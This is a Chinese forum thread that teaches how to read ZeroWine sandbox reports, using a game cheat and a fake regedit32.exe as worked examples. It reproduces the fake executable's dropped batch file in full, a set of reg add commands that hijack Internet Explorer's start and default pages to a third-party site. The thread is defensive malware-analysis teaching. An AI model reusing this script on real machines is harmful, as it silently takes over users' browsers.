实例讲解ZEROWINE的报告

roxiel

首先我们看一下网页的布局



网页上半部分，如果上传的程序分出了好几个子进程，会进行警告
==========================================================================
==========================================================================
下面，先从Strings讲起，就是字符串信息，能直接查看的

类似BINTEXT的功能






==========================================================================
==========================================================================
然后是File Header

除了特征，它还主要包含了

DOS_HEADER
NT_HEADERS
FILE_HEADER
OPTIONAL_HEADER

PE Sections
Directories
Imported symbols
等等主要内容，可谓是非常的详尽了，甚至每个Sector都计算了MD5 和SHA


它还会在Signature中提示你哪几个区段有问题








==========================================================================
==========================================================================

接下来看Signature,下图只有1个恶意特征，就是创建了管道，后门经常使用








==========================================================================
==========================================================================

最后我们看Report
呵呵，很详细，我们可以找到可疑行为的API，有的时候也有运行时的进程列表


下面是一个分析失败的报告，建议将超时时间从10改到9999999


咋样，下图熟悉吧。。。。SLEEP，不过一般看到这个，也就知道这不是啥好鸟了~~~~






==============================注意，下面是实例1啦==============================

我找了一个外挂
先看返回网页



再看Signature:

 
trace:file:CreateFileW L"\\\\.\\SICE" GENERIC_READ GENERIC_WRITE FILE_SHARE_READ FILE_SHARE_WRITE  creation 3 attributes 0x80
trace:file:CreateFileW L"\\\\.\\SIWVID" GENERIC_READ GENERIC_WRITE FILE_SHARE_READ FILE_SHARE_WRITE  creation 3 attributes 0x80
trace:file:CreateFileW L"\\\\.\\NTICE" GENERIC_READ GENERIC_WRITE FILE_SHARE_READ FILE_SHARE_WRITE  creation 3 attributes 0x80
//这就是刚才为什么说检测SICE了
0009:Call advapi32.RegOpenKeyExW(80000002,7eafd840 L"Software\\Microsoft\\Windows NT\\CurrentVersion",00000000,00000001,0032f144) ret=7eae4a62
0009:Call advapi32.RegOpenKeyExW(00000044,7eafd93c L"Drivers32",00000000,00000001,0032f140) ret=7eae4b49
trace:file:CreateFileW L"C:\\windows\\SYSTEM.INI" GENERIC_READ FILE_SHARE_READ FILE_SHARE_WRITE  creation 3 attributes 0x80
0009:Call advapi32.RegOpenKeyExW(80000002,7eab9040 L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Drivers32",00000000,00000001,0032d87c) ret=7eab29f8
trace:file:CreateFileW L"C:\\windows\\system.ini" GENERIC_READ FILE_SHARE_READ FILE_SHARE_WRITE  creation 3 attributes 0x80
0009:Call advapi32.RegCreateKeyW(80000002,008f0190 L"Software\\Microsoft\\AudioCompressionManager\\DriverCache\\msacm32.dll",0032d02c) ret=7eab249e
0009:Call KERNEL32.CreateProcessW(00000000,0032f750 L"C:\\windows\\system32\\explorer.exe /desktop",00000000,00000000,00000000,00000008,00000000,00000000,0032f9a0,0032f990) ret=7ee52ddc
0009:Call advapi32.RegCreateKeyExW(00000048,7ee7bf40 L"Temporary System Parameters",00000000,00000000,00000001,000f003f,00000000,7eea6690,00000000) ret=7ee438b5
0009:Call advapi32.RegCreateKeyW(80000002,008f01c8 L"Software\\Microsoft\\AudioCompressionManager\\DriverCache\\msacm32.dll",0032fb98) ret=7eab2018
0009:Call advapi32.RegSetValueExA(0000003c,7eab956e "cFormatTags",00000000,00000004,008f013c,00000004) ret=7eab2057
0009:Call advapi32.RegSetValueExA(0000003c,7eab957a "cFilterTags",00000000,00000004,008f0138,00000004) ret=7eab2096
0009:Call advapi32.RegSetValueExA(0000003c,7eab9586 "fdwSupport",00000000,00000004,008f0140,00000004) ret=7eab20d1
0009:Call advapi32.RegSetValueExA(0000003c,7eab9591 "aFormatTagCache",00000000,00000003,008f01b0,00000008) ret=7eab2164

然后看File Header:


这说明它捆绑了文件

最后的REPORT我就不讲了，它既包含了上传的程序的行为，也包含了ZEROWINE的工作行为，如果能认真看下去，就能进一步加深对ZEROWINE的工作机理的认识

总之其实从SIG和HEADER我们就可以认定这非正常程序了




==============================注意，下面是实例2啦==============================

一个假冒的regedit32.exe

看Signature

 
trace:file:CreateFileW L"C:\\windows\\1.bat" GENERIC_WRITE FILE_SHARE_READ FILE_SHARE_WRITE FILE_SHARE_DELETE  creation 3 attributes 0x80
trace:file:CreateFileW L"C:\\windows\\1.bat" GENERIC_WRITE FILE_SHARE_READ FILE_SHARE_WRITE FILE_SHARE_DELETE  creation 1 attributes 0x80
trace:file:CreateFileW L"C:\\windows\\1.bat" GENERIC_WRITE  creation 1 attributes 0x80
trace:file:CreateFileW L"C:\\windows\\exeb22.tmp" GENERIC_WRITE  creation 1 attributes 0x80
trace:file:CreateFileW L"C:\\windows\\exeb22.tmp" GENERIC_WRITE FILE_SHARE_READ  creation 2 attributes 0x80
0009:Call KERNEL32.CreateProcessA(00000000,00122088 ""C:\\windows\\1.bat"",00000000,00000000,00000001,08000000,00000000,00122510 "Z:\\tmp\\vir\\f89af884ba6678dc9865ccce449641d0",0032fb44,0032fcb4) ret=0040cc33

然后是HEADER

 
----------Signature----------
UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser

----------Parsing Warnings----------
Suspicious flags set for section 0. Both IMAGE_SCN_MEM_WRITE and IMAGE_SCN_MEM_EXECUTE are set.This might indicate a packed executable.
Suspicious flags set for section 1. Both IMAGE_SCN_MEM_WRITE and IMAGE_SCN_MEM_EXECUTE are set.This might indicate a packed executable.

REPORT这里照例还是不写了

帖它释放的1.bat

@rem ----- ExeScript Options Begin -----
@rem ScriptType: console,silent
@rem DestDirectory: temp
@rem Icon: D:\Program Files\ExeScript\regedit.ico
@rem OutputFile: C:\Documents and Settings\Administrator\
\regedit32.exe
@rem ----- ExeScript Options End -----
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d www.365wz.net/?15 /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d www.365wz.net/?15 /f
reg add "HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command" /ve /t reg_sz /d "C:\Program Files\Internet Explorer\iexplore.exe www.365wz.net/?15" /f

因此准备个VMware带影子沙盘也是很有必要的，下节课我们就讲如何取得病毒生成物

Hmily

太深奥了,完全看不懂.......

innovation

晕。你都看不懂。我们怎么办。

roxiel

3# innovation

请从头看起，这是系列文章~~~

另外，你楼上装呢。。。

dmyyc

晕。你都看不懂。我们怎么办。

sunyman

真看不懂

myxg

是地 我是看不懂

bmjzw

看不懂也要看很好的方法

wajika

这个玩意在我这睡了好久。我都忘记了

HAO125

还能不能介绍的详细些